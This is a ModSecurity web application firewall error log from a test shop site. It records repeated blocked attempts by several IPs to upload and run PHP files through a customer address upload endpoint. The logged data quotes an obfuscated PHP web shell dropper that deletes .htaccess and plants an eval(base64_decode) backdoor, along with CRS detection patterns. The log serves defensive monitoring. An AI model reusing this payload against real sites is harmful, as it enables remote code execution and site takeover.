[Sat Dec 27 00:50:21.102260 2025] [:error] [pid 1006518] [client 5.164.136.65:47800] [client 5.164.136.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/h/fh88364f428d25.php8"] [unique_id "aU8fPUjVkgsIvBjzRKqCBAAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 27 18:15:47.742909 2025] [:error] [pid 1011771] [client 46.149.66.101:55522] [client 46.149.66.101] ModSecurity: Rule 7f555a980be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/s/os88364f428d25.phar"] [unique_id "aVAUQ7tWUGk28ocUg5prgAAAAA8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 27 18:15:47.743418 2025] [:error] [pid 1011771] [client 46.149.66.101:55522] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/s/os88364f428d25.phar"] [unique_id "aVAUQ7tWUGk28ocUg5prgAAAAA8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 27 18:15:47.745832 2025] [:error] [pid 1011771] [client 46.149.66.101:55522] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/s/os88364f428d25.phar"] [unique_id "aVAUQ7tWUGk28ocUg5prgAAAAA8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 27 18:15:47.746025 2025] [:error] [pid 1011771] [client 46.149.66.101:55522] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/s/os88364f428d25.phar"] [unique_id "aVAUQ7tWUGk28ocUg5prgAAAAA8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 27 18:15:48.050499 2025] [:error] [pid 1011771] [client 46.149.66.101:55522] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: os88364f428d25.php8 found within FILES:custom_attributes[country_id]: os88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVAURLtWUGk28ocUg5prgQAAAA8"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/s/os88364f428d25.phar
[Sat Dec 27 18:15:48.051117 2025] [:error] [pid 1011771] [client 46.149.66.101:55522] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVAURLtWUGk28ocUg5prgQAAAA8"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/s/os88364f428d25.phar
[Sat Dec 27 18:15:48.051344 2025] [:error] [pid 1011771] [client 46.149.66.101:55522] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVAURLtWUGk28ocUg5prgQAAAA8"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/o/s/os88364f428d25.phar
[Sat Dec 27 18:15:48.451257 2025] [:error] [pid 1011771] [client 46.149.66.101:55522] [client 46.149.66.101] ModSecurity: Rule 7f555a980be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/s/os88364f428d25.php8"] [unique_id "aVAURLtWUGk28ocUg5prggAAAA8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 27 18:15:48.451711 2025] [:error] [pid 1011771] [client 46.149.66.101:55522] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/s/os88364f428d25.php8"] [unique_id "aVAURLtWUGk28ocUg5prggAAAA8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 27 18:15:48.454113 2025] [:error] [pid 1011771] [client 46.149.66.101:55522] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/s/os88364f428d25.php8"] [unique_id "aVAURLtWUGk28ocUg5prggAAAA8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 27 18:15:48.454308 2025] [:error] [pid 1011771] [client 46.149.66.101:55522] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/o/s/os88364f428d25.php8"] [unique_id "aVAURLtWUGk28ocUg5prggAAAA8"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 28 11:02:54.104863 2025] [:error] [pid 1033035] [client 5.164.136.65:50008] [client 5.164.136.65] ModSecurity: Rule 7f274eee2be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/e/he88364f428d25.phar"] [unique_id "aVEATvmZkgyLslm0LQCIfQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 28 11:02:54.105344 2025] [:error] [pid 1033035] [client 5.164.136.65:50008] [client 5.164.136.65] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/e/he88364f428d25.phar"] [unique_id "aVEATvmZkgyLslm0LQCIfQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 28 11:02:54.107655 2025] [:error] [pid 1033035] [client 5.164.136.65:50008] [client 5.164.136.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/e/he88364f428d25.phar"] [unique_id "aVEATvmZkgyLslm0LQCIfQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 28 11:02:54.107838 2025] [:error] [pid 1033035] [client 5.164.136.65:50008] [client 5.164.136.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/e/he88364f428d25.phar"] [unique_id "aVEATvmZkgyLslm0LQCIfQAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 28 11:02:55.140730 2025] [:error] [pid 1033035] [client 5.164.136.65:50008] [client 5.164.136.65] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: he88364f428d25.php8 found within FILES:custom_attributes[country_id]: he88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVEAT_mZkgyLslm0LQCIfgAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/h/e/he88364f428d25.phar
[Sun Dec 28 11:02:55.141342 2025] [:error] [pid 1033035] [client 5.164.136.65:50008] [client 5.164.136.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVEAT_mZkgyLslm0LQCIfgAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/h/e/he88364f428d25.phar
[Sun Dec 28 11:02:55.141512 2025] [:error] [pid 1033035] [client 5.164.136.65:50008] [client 5.164.136.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVEAT_mZkgyLslm0LQCIfgAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/h/e/he88364f428d25.phar
[Sun Dec 28 11:02:55.367762 2025] [:error] [pid 1033035] [client 5.164.136.65:50008] [client 5.164.136.65] ModSecurity: Rule 7f274eee2be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/e/he88364f428d25.php8"] [unique_id "aVEAT_mZkgyLslm0LQCIfwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 28 11:02:55.368245 2025] [:error] [pid 1033035] [client 5.164.136.65:50008] [client 5.164.136.65] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/e/he88364f428d25.php8"] [unique_id "aVEAT_mZkgyLslm0LQCIfwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 28 11:02:55.370562 2025] [:error] [pid 1033035] [client 5.164.136.65:50008] [client 5.164.136.65] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/e/he88364f428d25.php8"] [unique_id "aVEAT_mZkgyLslm0LQCIfwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 28 11:02:55.370741 2025] [:error] [pid 1033035] [client 5.164.136.65:50008] [client 5.164.136.65] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/h/e/he88364f428d25.php8"] [unique_id "aVEAT_mZkgyLslm0LQCIfwAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 29 06:23:19.460502 2025] [:error] [pid 1052344] [client 91.84.106.190:45720] [client 91.84.106.190] ModSecurity: Rule 7f2cb2250be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/6/v688364f428d25.phar"] [unique_id "aVIQRwr0ig2jL4trDlZ2hQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 29 06:23:19.460990 2025] [:error] [pid 1052344] [client 91.84.106.190:45720] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/6/v688364f428d25.phar"] [unique_id "aVIQRwr0ig2jL4trDlZ2hQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 29 06:23:19.463316 2025] [:error] [pid 1052344] [client 91.84.106.190:45720] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/6/v688364f428d25.phar"] [unique_id "aVIQRwr0ig2jL4trDlZ2hQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 29 06:23:19.463526 2025] [:error] [pid 1052344] [client 91.84.106.190:45720] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/6/v688364f428d25.phar"] [unique_id "aVIQRwr0ig2jL4trDlZ2hQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 29 06:23:19.700808 2025] [:error] [pid 1052344] [client 91.84.106.190:45720] [client 91.84.106.190] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: v688364f428d25.php8 found within FILES:custom_attributes[country_id]: v688364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVIQRwr0ig2jL4trDlZ2hgAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/6/v688364f428d25.phar
[Mon Dec 29 06:23:19.701455 2025] [:error] [pid 1052344] [client 91.84.106.190:45720] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVIQRwr0ig2jL4trDlZ2hgAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/6/v688364f428d25.phar
[Mon Dec 29 06:23:19.701619 2025] [:error] [pid 1052344] [client 91.84.106.190:45720] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aVIQRwr0ig2jL4trDlZ2hgAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/6/v688364f428d25.phar
[Mon Dec 29 06:23:22.152888 2025] [:error] [pid 1052344] [client 91.84.106.190:45720] [client 91.84.106.190] ModSecurity: Rule 7f2cb2250be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/6/v688364f428d25.php8"] [unique_id "aVIQSgr0ig2jL4trDlZ2hwAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 29 06:23:22.153328 2025] [:error] [pid 1052344] [client 91.84.106.190:45720] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/6/v688364f428d25.php8"] [unique_id 